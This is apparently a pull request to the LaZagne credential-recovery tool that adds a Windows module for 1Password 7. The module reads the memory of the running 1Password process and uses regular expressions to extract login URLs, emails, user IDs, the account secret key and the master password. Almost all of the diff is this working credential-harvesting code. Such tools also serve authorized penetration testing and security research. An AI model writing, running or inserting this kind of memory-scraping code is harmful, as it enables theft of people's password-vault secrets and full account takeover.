### PR TITLE
Added 1Password7 (Windows) module

### DIFF
--- a/Windows/lazagne/config/manage_modules.py
+++ b/Windows/lazagne/config/manage_modules.py
@@ -28,6 +28,7 @@ from lazagne.softwares.maven.mavenrepositories import MavenRepositories
 # Memory
 from lazagne.softwares.memory.keepass import Keepass
 from lazagne.softwares.memory.memorydump import MemoryDump
+from lazagne.softwares.memory.onepassword import OnePassword
 # Multimedia
 from lazagne.softwares.multimedia.eyecon import EyeCON
 # Php
@@ -125,6 +126,7 @@ def get_modules():
         # Memory
         MemoryDump(),  # retrieve browsers and keepass passwords
         Keepass(),  # should be launched after memory dump
+        OnePassword(),
 
         # Multimedia
         EyeCON(),

--- a/Windows/lazagne/softwares/memory/onepassword.py
+++ b/Windows/lazagne/softwares/memory/onepassword.py
@@ -1,0 +1,53 @@
+from lazagne.config.lib.memorpy import Process, MemWorker
+from lazagne.config.module_info import ModuleInfo
+
+
+class OnePassword(ModuleInfo):
+
+    def __init__(self):
+        ModuleInfo.__init__(self, "1Password", 'memory')
+
+    def run(self):
+        pwd_found = []
+
+        for process in Process.list():
+            if process.get('name') == '1Password.exe':
+                mw = MemWorker(pid=process.get('pid'))
+
+                # Search for Account Details
+                account_details = r'{"title":".*","url":"(.*)","ainfo":"(.*)","ps":.*,"pbe":.*,' \
+                                  '"pgrng":.*,"URLs":\[{"l":".*","u":"(.*)"}\],"b5UserUUID":"(.*)",' \
+                                  '"tags":\[.*\]}'
+
+                for _, v in mw.mem_search(account_details, ftype='groups'):
+                    pwd_found.append({
+                        "Process": str(process),
+                        'Login URL': str(v[0]),
+                        'Email': str(v[1]),
+                        'User ID': str(v[3]),
+                    })
+
+                # Search for Secret Key
+                secret_key = '{"name":"account-key","value":"(.{2}-.{6}-.{6}-.{5}-.{5}-.{5}-.{5})","type":"T"}'
+                for _, v in mw.mem_search(secret_key, ftype='groups'):
+                    pwd_found.append({
+                        'Process': str(process),
+                        'Account Key': str(v[0])
+                    })
+
+                # Search for Master Password
+                master_password = '{"name":"master-password","value":"(.*)","type":"P","designation":"password"}'
+                junk = '","type":"P","designation":"password"}'
+
+                for _, v in mw.mem_search(master_password, ftype='groups'):
+                    v = v[0]  # Remove Tuple
+
+                    if junk in v:  # Hacky way of fixing weird regex bug ?!
+                        v = v.split(junk)[0]
+
+                    pwd_found.append({
+                        'Process': str(process),
+                        'Master Password': str(v)
+                    })
+
+        return pwd_found


### PR DESCRIPTION
I have added support for 1Password7 for Windows.

The module attempts to extract the password managers login details such as the username, url, secret key, and master password by utilizing the MemWorker class and regular expressions.

This capability has been extracted from my script:
https://github.com/notdeclan/1password-memory-dump-analyzer